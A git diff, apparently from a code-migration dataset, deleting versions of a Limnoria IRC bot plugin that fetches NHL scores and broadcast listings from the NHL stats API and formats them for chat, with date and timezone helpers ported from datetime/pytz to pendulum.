-############################ -# Formatting helpers -############################ - def _resultAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._gameToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _resultTVAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._TVToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _TVToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {} [{}]".format(away_team, home_team, starting_time, ircutils.bold(game['broadcasts'])) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - #print('got here ', game['broadcasts']) - - base_str = '' - if not game['ended']: - base_str = ' [{}]'.format(game['broadcasts']) - - game_string = "{} {} {}{}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type']), - base_str) - - return game_string - - def _gameToString(self, game): - """ Given a game, format the information into a string according to the - context. 
For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type'])) - - return game_string - - def _clockBoardToString(self, clock, period, game_ended, pregame=None, gType=None): - """Get a string with current period and, if the game is still - in progress, the remaining time in it.""" - period_number = period - # Game hasn't started => There is no clock yet. - if period_number == 0: - return "" - - # Halftime - #if period: - # return ircutils.mircColor('Halftime', 'orange') - - period_string = self._periodToString(period_number, gType) - - # Game finished: - if game_ended or clock.upper() == "FINAL": - if period_number == 3: - return ircutils.mircColor('F', 'red') - else: - return ircutils.mircColor("F/{}".format(period_string), 'red') - - # Game in progress: - if clock.upper() == "END": - return ircutils.mircColor("End {}".format(period_string), 'light blue') - else: - # Period in progress, show clock: - if pregame: - return "{}".format(ircutils.mircColor('Pre-Game', 'green')) - return "{}{}".format(clock + ' ' if clock != '00:00' else "", ircutils.mircColor(period_string, 'green')) - - def _periodToString(self, period, gType): - """Get a string describing the current period in the game. - period is an integer counting periods from 1 (so 5 would be OT1). 
- The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes).""" - if period <= 3: - return "P{}".format(period) - - ot_number = period - 3 - if ot_number == 1: - return "OT" - # if regular/pre season game, we have shootouts - if gType == 'R' or gType == 'PR': - if ot_number > 1: - return "SO" - return "{}OT".format(ot_number) - -############################ -# Date-manipulation helpers -############################ - def _getTodayDate(self): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will consider and - return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly when the - day rolls over at midnight, which would cause us to ignore games - in progress that may have started on the previous day. - Taking the west coast time guarantees that the day will advance only - when the whole continental US is already on that day.""" - today = self._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso #.replace('-', '') - - def _easternTimeNow(self): - return datetime.datetime.now(pytz.timezone('US/Eastern')) - - def _pacificTimeNow(self): - return datetime.datetime.now(pytz.timezone('US/Pacific')) - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a - time (target timezone) formatted with am/pm. Defaults to US/Eastern.""" - try: - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - try: - target = self._checkTarget(target) - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) - - def _checkTarget(self, target): - """check input among common tz""" - target = target.upper() - common = {'CT': 'US/Central', - 'CDT': 'US/Central', - 'CST': 'US/Central', - 'MT': 'US/Mountain', - 'MDT': 'US/Mountain', - 'MST': 'US/Mountain', - 'PT': 'US/Pacific', - 'PDT': 'US/Pacific', - 'PST': 'US/Pacific', - 'ET': 'US/Eastern', - 'EDT': 'US/Eastern', - 'EST': 'US/Eastern', - 'CENTRAL': 'US/Central', - 'EASTERN': 'US/Eastern', - 'PACIFIC': 'US/Pacific', - 'MOUNTAIN': 'US/Mountain'} - if target in common: - target = common[target] - - return target - - def _ISODateToEasternTime(self, iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. 
(The default human-readable format - for the listing of games).""" - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) # Strip the seconds - - def _stripDateSeparators(self, date_string): - return date_string.replace('-', '') - - def _EnglishDateToDate(self, date): - """Convert a human-readable like 'yesterday' to a datetime object - and return a 'YYYYMMDD' string.""" - if date == "lastweek": - day_delta = -7 - elif date == "yesterday": - day_delta = -1 - elif date == "today" or date =="tonight": - day_delta = 0 - elif date == "tomorrow": - day_delta = 1 - elif date == "nextweek": - day_delta = 7 - elif date[:3] == 'sun': - date_string = pendulum.now('US/Pacific').next(pendulum.SUNDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'mon': - date_string = pendulum.now('US/Pacific').next(pendulum.MONDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'tue': - date_string = pendulum.now('US/Pacific').next(pendulum.TUESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'wed': - date_string = pendulum.now('US/Pacific').next(pendulum.WEDNESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'thu': - date_string = pendulum.now('US/Pacific').next(pendulum.THURSDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'fri': - date_string = pendulum.now('US/Pacific').next(pendulum.FRIDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'sat': - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string - date_string = (self._pacificTimeNow() + - datetime.timedelta(days=day_delta)).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. 
Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" - - error_string = 'Incorrect date format, should be YYYY-MM-DD' - - if date is None: - return None - - if date in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) -# elif date[:3].upper() in self._TEAMS_BY_TRI: -# date = date[:3].upper() -# return date - - #try: - # date = dateutil.parser.parse(date) - #except: - # raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - #print(date) - - if date.isdigit(): - try: - date = datetime.datetime.strptime(date, '%Y%m%d').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: - parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: - year = '/' + str(datetime.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: - date = '{}/{}/{}'.format(date.split('/')[0], date.split('/')[1], '20{}'.format(date.split('/')[2])) - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: - date = datetime.datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: - if date.title() in ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']: - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() - year = str(datetime.datetime.now().year) - date += year - try: - date = datetime.datetime.strptime(date, '%d%b%Y').strftime('%Y-%m-%d') - except: - date = datetime.datetime.strptime(date, '%b%d%Y').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" - else: - return None - - return date - -Class = NHL - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py deleted file mode 100644 index 25f1733..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py +++ /dev/null @@ -1,746 +0,0 @@ -### -# Copyright (c) 2016, Santiago Gil -# Copyright (c) 2020, oddluck -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . 
-### - -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import json -import urllib.request -import pendulum -import requests - -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NHL') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -class NHL(callbacks.Plugin): - """Get scores from NHL.com.""" - def __init__(self, irc): - self.__parent = super(NHL, self) - self.__parent.__init__(irc) - - self._SCOREBOARD_ENDPOINT = ("https://statsapi.web.nhl.com/api/v1/schedule?startDate={}&endDate={}" + - "&expand=schedule.teams,schedule.linescore,schedule.broadcasts.all,schedule.ticket,schedule.game.content.media.epg" + - "&leaderCategories=&site=en_nhl&teamId=") - # https://statsapi.web.nhl.com/api/v1/schedule?startDate=2016-12-15&endDate=2016-12-15 - # &expand=schedule.teams,schedule.linescore,schedule.broadcasts,schedule.ticket,schedule.game.content.media.epg - # &leaderCategories=&site=en_nhl&teamId= - - self._FUZZY_DAYS = ['yesterday', 'tonight', 'today', 'tomorrow', - 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'] - - # These two variables store the latest data acquired from the server - # and its modification time. It's a one-element cache. - # They are used to employ HTTP's 'If-Modified-Since' header and - # avoid unnecessary downloads for today's information (which will be - # requested all the time to update the scores). - self._today_scores_cached_url = None - self._today_scores_last_modified_time = None - self._today_scores_last_modified_data = None - - self._TEAMS_BY_TRI = self._getTeams() - - #pendulum.set_formatter('alternative') - - def nhl(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get games for a given date (YYYY-MM-DD). If none is specified, return games - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. 
- tz = None - if optional_team is None: - team = "all" - if optional_date: - if '--tz' in optional_date: - tz = optional_date.split()[2] - optional_date = optional_date.split()[0] - try: - date = self._checkDateInput(optional_date) - #print("1") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - if optional_team == '--tz': - tz = optional_date - team = 'all' - date = None - else: - date = self._checkDateInput(optional_team) - #print("2") - if date: # and len(date) != 3: - team = "all" -# elif date and len(date) == 3: -# team = date -# date = None - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - #print("3") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - if not tz: - tz = 'US/Eastern' - games = self._getTodayGames(team, tz) - games_string = self._resultAsString(games) - if not games_string: - irc.reply("No games found for {}".format(team)) - return - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[1]['clock'], games[1]['ended']) - if len(games) == 2: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - #print(games) - irc.reply(games_string_date + games_string) - else: - games = self._getGamesForDate(team, date) - games_string = self._resultAsString(games) - #print(games_string) - if games_string == '': - irc.reply("No games found for {}".format(team)) - return - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - nhl = wrap(nhl, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTeams(self): - - url = 'https://statsapi.web.nhl.com/api/v1/teams' - try: - data = requests.get(url).json() - data = data['teams'] - except: - return None - - teams = [] - for team in data: - teams.append(team['abbreviation']) - return teams - - def nhltv(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get television broadcasts for a given date (YYYY-MM-DD). If none is specified, return broadcasts - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. 
- if optional_team is None: - team = "all" - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - date = self._checkDateInput(optional_team) - if date: - team = "all" - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - games = self._getTodayTV(team) - games_string = self._resultTVAsString(games) - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[0]['clock'], games[0]['ended']) - if len(games) == 1: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - irc.reply(games_string_date + games_string) - else: - games = self._getTVForDate(team, date) - if isinstance(games, str): - irc.reply(games) - return - games_string = self._resultTVAsString(games) - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - #if date is None: - # irc.reply(self._getTodayTV(team)) - #else: - # irc.reply(self._getTVForDate(team, date)) - - nhltv = wrap(nhltv, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTodayGames(self, team, tz='US/Eastern'): - games = self._getGames(team, self._getTodayDate(), tz) - return games - - def _getGamesForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - - def _getTodayTV(self, team): - games = self._getGames(team, self._getTodayDate()) - return games - - def _getTVForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - -############################ -# Content-getting helpers -############################ - def _getGames(self, team, date, tz='US/Eastern'): - """Given a date, populate the url with it and try to download its - content. If successful, parse the JSON data and extract the relevant - fields for each game. Returns a list of games.""" - url = self._getEndpointURL(date) - - # (If asking for today's results, enable the 'If-Mod.-Since' flag) - use_cache = (date == self._getTodayDate()) - #use_cache = False - response = self._getURL(url, use_cache) - if isinstance(response, str): - return "ERROR: Something went wrong, check input" - - json = self._extractJSON(response) - games = self._parseGames(json, team, tz) - return games - - def _getEndpointURL(self, date): - return self._SCOREBOARD_ENDPOINT.format(date, date) - - def _getURL(self, url, use_cache=False): - """Use urllib to download the URL's content. The use_cache flag enables - the use of the one-element cache, which will be reserved for today's - games URL. (In the future we could implement a real cache with TTLs).""" - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - response = None - - # ('If-Modified-Since' to avoid unnecessary downloads.) 
- if use_cache and self._haveCachedData(url): - header['If-Modified-Since'] = self._today_scores_last_modified_time - - request = urllib.request.Request(url, headers=header) - #print(url) - - try: - response = urllib.request.urlopen(request) - except urllib.error.HTTPError as error: - if use_cache and error.code == 304: # Cache hit - self.log.info("{} - 304" - "(Last-Modified: " - "{})".format(url, self._cachedDataLastModified())) - return self._cachedData() - else: - self.log.error("HTTP Error ({}): {}".format(url, error.code)) - pass - - self.log.info("{} - 200".format(url)) - - if not response: - return "ERROR: Something went wrong, check input" - - if not use_cache: - return response.read() - - # Updating the cached data: - self._updateCache(url, response) - return self._cachedData() - - def _extractJSON(self, body): - return json.loads(body.decode('utf-8')) - - def _parseGames(self, json, team, tz='US/Eastern'): - """Extract all relevant fields from NHL.com's json - and return a list of games.""" - games = [] - if json['totalGames'] == 0: - return games - games.append(json['dates'][0]['date']) - for g in json['dates'][0]['games']: - #print(g) - # Starting times are in UTC. By default, we will show Eastern times. - # (In the future we could add a user option to select timezones.) - tbd_check = self._ISODateToEasternTime(g['gameDate']) - #print(tbd_check) - if '3:00 AM' in tbd_check: - starting_time = 'TBD' - #starting_time_TBD = True - else: - if 'US/Eastern' not in tz: - starting_time = self._convertISODateToTime(g['gameDate'], tz) - else: - starting_time = self._ISODateToEasternTime(g['gameDate']) - broadcasts = [] - try: - for item in g['broadcasts']: - broadcasts.append(item['name']) - except: - pass - #print(broadcasts) - game_info = {'home_team': g['teams']['home']['team']['abbreviation'], - 'away_team': g['teams']['away']['team']['abbreviation'], - 'home_score': g['teams']['home']['score'], - 'away_score': g['teams']['away']['score'], - 'broadcasts': '{}'.format(', '.join(item for item in broadcasts)), - 'starting_time': starting_time, - 'starting_time_TBD': g['status']['startTimeTBD'], - 'pregame': (True if 'Pre-Game' in g['status']['detailedState'] else False), - 'period': g['linescore']['currentPeriod'], - 'clock': g['linescore'].get('currentPeriodTimeRemaining'), - 'powerplay_h': g['linescore']['teams']['home']['powerPlay'], - 'powerplay_a': g['linescore']['teams']['away']['powerPlay'], - 'goaliePulled_h': g['linescore']['teams']['home']['goaliePulled'], - 'goaliePulled_a': g['linescore']['teams']['away']['goaliePulled'], - 'ended': (g['status']['statusCode'] == '7' or g['status']['statusCode'] == '9'), - 'ppd': (g['status']['statusCode'] == '9'), - 'type': g['gameType'] - } - #print(game_info) - if team == "all": - games.append(game_info) - else: - if team in game_info['home_team'] or team in game_info['away_team']: - games.append(game_info) - else: - pass - return games - -############################ -# Today's games cache -############################ - def _cachedData(self): - return self._today_scores_last_modified_data - - def _haveCachedData(self, url): - return (self._today_scores_cached_url == url) and \ - (self._today_scores_last_modified_time is not None) - - def _cachedDataLastModified(self): - return self._today_scores_last_modified_time - - def _updateCache(self, url, response): - self._today_scores_cached_url = url - self._today_scores_last_modified_time = response.headers['last-modified'] - self._today_scores_last_modified_data = response.read() - 
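Taken as a whole, this target file records the datetime/pytz-to-pendulum side of the migration: strptime directives become pendulum format tokens, pytz timezone lookups become plain zone-name strings, and timedelta arithmetic becomes a fluent add() call. A side-by-side sketch of those equivalences (illustrative only, not part of the recorded files; note that the recorded target also calls pendulum.datetime.now(), which would fail on pendulum 2.x, where pendulum.now() is the working spelling):

import datetime
import pendulum
import pytz

# Parsing: strptime directives vs. pendulum format tokens.
d1 = datetime.datetime.strptime('2020-02-01', '%Y-%m-%d')
d2 = pendulum.from_format('2020-02-01', 'YYYY-MM-DD')
assert d1.strftime('%m/%d/%y') == d2.strftime('%m/%d/%y')

# Timezone-aware "now": pytz lookup vs. a built-in zone-name string.
now_pytz = datetime.datetime.now(pytz.timezone('US/Pacific'))
now_pend = pendulum.now('US/Pacific')

# Date arithmetic: timedelta vs. pendulum's add().
next_week_pytz = (now_pytz + datetime.timedelta(days=7)).strftime('%Y-%m-%d')
next_week_pend = now_pend.add(days=7).strftime('%Y-%m-%d')

# Current year, as the recorded target presumably intended it:
year = str(pendulum.now().year)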
-############################ -# Formatting helpers -############################ - def _resultAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._gameToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _resultTVAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._TVToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _TVToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {} [{}]".format(away_team, home_team, starting_time, ircutils.bold(game['broadcasts'])) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - #print('got here ', game['broadcasts']) - - base_str = '' - if not game['ended']: - base_str = ' [{}]'.format(game['broadcasts']) - - game_string = "{} {} {}{}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type']), - base_str) - - return game_string - - def _gameToString(self, game): - """ Given a game, format the information into a string according to the - context. 
For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type'])) - - return game_string - - def _clockBoardToString(self, clock, period, game_ended, pregame=None, gType=None): - """Get a string with current period and, if the game is still - in progress, the remaining time in it.""" - period_number = period - # Game hasn't started => There is no clock yet. - if period_number == 0: - return "" - - # Halftime - #if period: - # return ircutils.mircColor('Halftime', 'orange') - - period_string = self._periodToString(period_number, gType) - - # Game finished: - if game_ended or clock.upper() == "FINAL": - if period_number == 3: - return ircutils.mircColor('F', 'red') - else: - return ircutils.mircColor("F/{}".format(period_string), 'red') - - # Game in progress: - if clock.upper() == "END": - return ircutils.mircColor("End {}".format(period_string), 'light blue') - else: - # Period in progress, show clock: - if pregame: - return "{}".format(ircutils.mircColor('Pre-Game', 'green')) - return "{}{}".format(clock + ' ' if clock != '00:00' else "", ircutils.mircColor(period_string, 'green')) - - def _periodToString(self, period, gType): - """Get a string describing the current period in the game. - period is an integer counting periods from 1 (so 5 would be OT1). 
- The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes).""" - if period <= 3: - return "P{}".format(period) - - ot_number = period - 3 - if ot_number == 1: - return "OT" - # if regular/pre season game, we have shootouts - if gType == 'R' or gType == 'PR': - if ot_number > 1: - return "SO" - return "{}OT".format(ot_number) - -############################ -# Date-manipulation helpers -############################ - def _getTodayDate(self): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will consider and - return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly when the - day rolls over at midnight, which would cause us to ignore games - in progress that may have started on the previous day. - Taking the west coast time guarantees that the day will advance only - when the whole continental US is already on that day.""" - today = self._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso #.replace('-', '') - - def _easternTimeNow(self): - return pendulum.now('US/Eastern') - - def _pacificTimeNow(self): - return pendulum.now('US/Pacific') - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a - time (target timezone) formatted with am/pm. Defaults to US/Eastern.""" - try: - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - try: - target = self._checkTarget(target) - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) - - def _checkTarget(self, target): - """check input among common tz""" - target = target.upper() - common = {'CT': 'US/Central', - 'CDT': 'US/Central', - 'CST': 'US/Central', - 'MT': 'US/Mountain', - 'MDT': 'US/Mountain', - 'MST': 'US/Mountain', - 'PT': 'US/Pacific', - 'PDT': 'US/Pacific', - 'PST': 'US/Pacific', - 'ET': 'US/Eastern', - 'EDT': 'US/Eastern', - 'EST': 'US/Eastern', - 'CENTRAL': 'US/Central', - 'EASTERN': 